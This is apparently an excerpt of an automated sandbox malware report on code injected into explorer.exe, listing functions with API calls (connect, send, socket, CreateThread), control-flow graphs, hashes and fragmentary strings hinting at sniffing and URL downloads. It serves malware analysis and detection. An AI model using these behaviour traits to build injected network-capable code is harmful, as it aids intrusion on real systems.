                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                                                                                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                                                                                  • Instruction ID: bacd990213b65ede5b745f8bf33b59ac8fde9ed3bfea172d34472e5590897aa6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59412970928A088FDB94EFA8C499BAD77F0FB68300F04457AC84EDB255DE349A45CB85
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B40E72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 401 b40e72e-b40e768 402 b40e788-b40e7ab connect 401->402 403 b40e76a-b40e782 call b411942 401->403 403->402
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                                                                                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                                                                                                  • Instruction ID: a2b836bb9880b232848eaadf9dfe6d095b638570ef28a395f50c2da0bcf160cb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51015E30618B188FCB84EF1CE088B55B7E0FB58314F1545AED90DCB266CA74C9818BC2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B40E732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 406 b40e732-b40e768 407 b40e788-b40e7ab connect 406->407 408 b40e76a-b40e782 call b411942 406->408 408->407
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                                                                                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                                                                                                  • Instruction ID: e5fd30718bfc1e33408fe06534d4df9d7f9b657fdc402e312a75b4ccc0fc059b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43012170618A1C8FCB84EF5CE048B5577E0FB59314F1545AE990DCB266CA74C9818BC2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B40E6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 411 b40e6b2-b40e6e5 412 b40e705-b40e72d send 411->412 413 b40e6e7-b40e6ff call b411942 411->413 413->412
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                                                  • String ID: send
                                                                                                                                                                                                                                                                  • API String ID: 2809346765-2809346765
                                                                                                                                                                                                                                                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                                                                                                  • Instruction ID: 7792fd447bec159fb29eb6780ca38c5a02308a80a5db7482fc3a23b3f5afbd75
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7011270558A188FDB84EF5CE049B2577E0EB58314F1545AED85DCB266CA70D981CB81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B40E5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 416 b40e5b2-b40e5ea 417 b40e60a-b40e62b socket 416->417 418 b40e5ec-b40e604 call b411942 416->418 418->417
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                                                                                                  • String ID: sock
                                                                                                                                                                                                                                                                  • API String ID: 98920635-2415254727
                                                                                                                                                                                                                                                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                                                                                                  • Instruction ID: 4cb63fc331e94fdf22c78a252732ed50d3eeeb127d47333d99dcd2754001a246
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 770121706186188FCB84EF5CE048B55BBE0FB59314F1545AED45EDB266C7B0C981CB86
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B4062DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 421 b4062dd-b406320 call b411942 424 b406326 421->424 425 b4063fa-b40640e 421->425 426 b406328-b406339 SleepEx 424->426 426->426 427 b40633b-b406341 426->427 428 b406343-b406349 427->428 429 b40634b-b406352 427->429 428->429 430 b40635c-b40636a call b410f12 428->430 431 b406370-b406376 429->431 432 b406354-b40635a 429->432 430->431 434 b4063b7-b4063bd 431->434 435 b406378-b40637e 431->435 432->430 432->431 436 b4063d4-b4063db 434->436 437 b4063bf-b4063cf call b406e72 434->437 435->434 439 b406380-b40638a 435->439 436->426 441 b4063e1-b4063f5 call b4060f2 436->441 437->436 439->434 442 b40638c-b4063b1 call b407432 439->442 441->426 442->434
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                                                                                                  • Instruction ID: 190e9dfec6af3823c6914350d11de58877e40ba9ab07399510c2200e2793afb2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88316CB4924B0ADEDB64EF6980483A6B7A1FB54300F45467FC92ECA246CB749264CFD1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B406412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 457 b406412-b406446 call b411942 460 b406473-b40647d 457->460 461 b406448-b406472 call b413c9e CreateThread 457->461
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                                                                                                  • Instruction ID: f0925788f1ad0115a61b8a7dc45809aafdc8449b6ad43a6af3daa9035879da7d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF0C230668A484FD788EF2CD44562AB3E0EBA8214F450A3FA54DC3264DA39C6818716
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 0E8E8AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                                                                                  • Instruction ID: 182cd6c00289985868c38687ef9c671100e82423f9322107850339999f792c05
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74C18C70618F099FC759EF28C4956EAF3E1FB99304F404B2E949AC7250DF70A915CB86
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0E8E60B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                                                                                  • Instruction ID: f7c8801a01224584c14ebe81e693897dbd43b87af567ad79cc03cf79ec4d30a4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE31B07150CB885FD72AEB28C4846EAB7D4FB95300F504D5EE4ABC7752EA30A949CA43
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0E8E48BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                                                                  • Instruction ID: 7f6a31fe0a3d336db855d20073b9af495e9ccd53b1daa6565579f1784759413c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E21D530A10A0C8BCB15EFA8C8847ED7BE0FF59204F40461AD45AD7750DF748A05C78A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0E8E5E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                                                                                  • Instruction ID: 352a3982f636a07cc018ee04549c4649e029ba0c130d0b834d9e7bd24d67ca57
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1216B70A24A0E9BDB58EFA8D0447EEBBF1FB58314F504A2ED009E3B00DB7499558B85
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0E8E5E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                                                                                  • Instruction ID: 68d5749b8abe7901f37bfb9730dbbbd3c99559a538ae2dcaa9e2f62400cfd95c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA215C70A24A0E9BDB58EFA8D0447EEBAF1FB58314F504A2ED009D3B10DB7499558B85
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%